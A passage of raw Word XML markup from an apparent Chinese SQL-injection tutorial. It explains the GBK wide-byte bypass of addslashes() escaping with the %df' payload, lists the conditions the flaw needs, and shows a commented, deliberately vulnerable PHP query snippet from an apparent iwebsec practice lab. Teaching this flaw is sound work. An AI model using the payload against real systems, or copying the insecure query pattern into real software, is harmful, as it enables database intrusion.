        <w:t>转义为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），此时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语句为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>LECT * FROM users WHERE id='1\%27'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，单引号被转义，无法闭合，注入失败。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FA622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lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）宽字节绕过逻辑：用户输入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%df'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%df%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），程序转义后变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%df%5c%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被转义为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）；由于数据库连接字符集为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（宽字节编码），</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码会将两个连续的字节解析为一个汉字，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%df%5c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被解析为一个合法的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>汉字（如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運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），转义符</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>被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吞掉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；剩余的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>%27</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（单引号）成功逃逸，闭合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语句，注入成功。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEAA06C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="heading_24"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>漏洞触发的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>个必要条件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="3956FFE6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1.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>数据库连接字符集为宽字节编码：必须是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GB2312</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等宽字节编码，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>编码下无法触发（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>是多字节编码，但解析规则不同，不会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吞掉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转义符）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417BD735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2.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>程序使用不安全的转义函数：必须使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>addslashes()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/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>magic_quotes_gpc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>等函数转义单引号，若使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>mysqli_real_escape_string()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>（指定字符集为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），则无法绕过。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1767E749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3.  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>字符集不一致：前端输入、后端程序、数据库连接的字符集不统一（如前端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>UTF-8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>、后端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>GBK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>），导致转义符的解析出现偏差。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A42424C" w14:textId="77777777" w:rsidR="007220A3" w:rsidRDefault="003C05FE">
      <w:pPr>
        <w:spacing w:before="300" w:after="120" w:line="288" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="heading_25"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>底</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="等线" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>层漏洞代码逻辑（含注释）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26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7220A3" w14:paraId="608F3AA6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87D592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php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 xml:space="preserve">// 1. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>连接数据库，未指定字符集（默认使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>）</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$conn = mysqli_connect("localhost","root","root","iwebsec");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// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>关键漏洞点：未设置字符集为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>UTF-8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，默认使用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>宽字节编码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// 2. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>接收用户输入，转义特殊字符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$id = addslashes($_GET['id']); // </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>接收</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>参数，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>addslashes()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>转义单引号为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>\'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// 3. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>动态拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>语句，未使用参数化查询</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$sql =</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> "SELECT * FROM users WHERE id='$id' LIMIT 0,1";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// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>当输入</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>id=1%df'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>时，转义后变为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>id=1%df\%27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>GBK</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>解析为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>運</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，单引号闭合</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL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// </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>最终执行的</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SELECT * FROM users WHERE id='1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>運</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>' LIMIT 0,1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>，注入成功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// 4. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>执行</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>并输出结果</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$result = mysqli_query($conn,$sql);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>$row = mysqli_fetch_array($result);</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>echo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> "ID:".$row['id']."&lt;br/&gt;";</w:t>
            </w:r>
            <w:r>
              <w:rPr>
